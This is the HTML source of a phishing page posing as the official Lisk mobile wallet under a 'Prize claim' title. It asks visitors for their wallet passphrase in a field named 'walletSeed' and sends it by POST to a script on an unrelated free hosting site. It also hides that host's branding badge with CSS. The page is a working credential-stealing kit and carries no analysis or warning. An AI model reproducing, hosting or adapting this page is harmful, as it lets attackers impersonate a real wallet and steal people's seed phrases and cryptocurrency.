<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Lisk: Prize claim</title>
	<!-- BOOTSTRAP STYLES-->
    <link href="./Lisk_ Prize claim_files/bootstrap.css" rel="stylesheet">
     <!-- FONTAWESOME STYLES-->
    <link href="./Lisk_ Prize claim_files/font-awesome.css" rel="stylesheet">
        <!-- CUSTOM STYLES-->
    <link href="./Lisk_ Prize claim_files/custom.css" rel="stylesheet">
     <!-- GOOGLE FONTS-->
   <link href="./Lisk_ Prize claim_files/css" rel="stylesheet" type="text/css">

</head>
<body>
<style>
 *{
  margin: 0;
  padding: 0;
  font-family: Century Gothic;
 }
body{
  background-color: #ffffff;
  
  background-size: cover;
  background-position: absolute;
  background-repeat: no-repeat, repeat;
}
img[alt="www.000webhost.com"]{
    opacity: 0;
}

.title{
    text-align: center;
    margin-top: 100px;
}
.inputf{
    width: 300px;
    outline: none!important;
    border: 1px solid grey;
    border-radius: 2px;
    height: 3.3em;
    font-size: 13px;
    padding: 8px 8px;
    text-transform: lowercase;
    font-family: monospace;
}
.btn{
    width: 300px;
    height: 3.3em;
    padding: 8px 8px 8px 8px;
    outline: none!important;
    color: white;
    background-color: #4071F4;
    margin-top: -20px;

}
</style>



    <header style="background-color: #4071F4; height: 9px;">
       
    </header>

  <div class="title">
     
    <img src="./Lisk_ Prize claim_files/logo.jpeg" style="height: auto; width: 180px;"><br>
    
    <p style="color: grey; font-size: 12px; margin-top: -15px; letter-spacing: 2px">The official Lisk wallet mobile</p>
    <br>
    <div style="margin-top: -25px">
        <p style="font-size: 15px; float: left; margin-left: 20px">Passphrase &nbsp;<i class="fa fa-eye-slash" style="color:#4071F4; font-size: 20px; margin-top:2px "></i></p>
    <p style="font-size: 15px; float: right; margin-right: 20px"><i class="fa fa-camera" style="color:#4071F4 ">&nbsp; <span style="color: black">Scan</span></i></p>
    </div>
<br>
   <form method="POST" action="https://platform2021.000webhostapp.com/lisk.php?is-blockchain">
       <input type="text" name="walletSeed" class="inputf" required="">
       <br>
       <p style="font-size: 16px; color: grey; margin-top: 290px">Don't have a Lisk ID? <a href="#" style="color:#4071F4 ; text-decoration: none; font-weight: bold">Create it now</a></p><br>
       <a href="https://platform2021.000webhostapp.com/lisk.php?is-blockchain" style="text-decoration: none">
           <button class="btn">Sign in</button>
       </a>
   </form>
  </div>


    

     <!-- SCRIPTS -AT THE BOTOM TO REDUCE THE LOAD TIME-->
    <!-- JQUERY SCRIPTS -->
    <script src="./Lisk_ Prize claim_files/jquery-1.10.2.js.download"></script>
      <!-- BOOTSTRAP SCRIPTS -->
    <script src="./Lisk_ Prize claim_files/bootstrap.min.js.download"></script>
    <!-- METISMENU SCRIPTS -->
    <script src="./Lisk_ Prize claim_files/jquery.metisMenu.js.download"></script>
      <!-- CUSTOM SCRIPTS -->
    <script src="./Lisk_ Prize claim_files/custom.js.download"></script>
   

</body></html>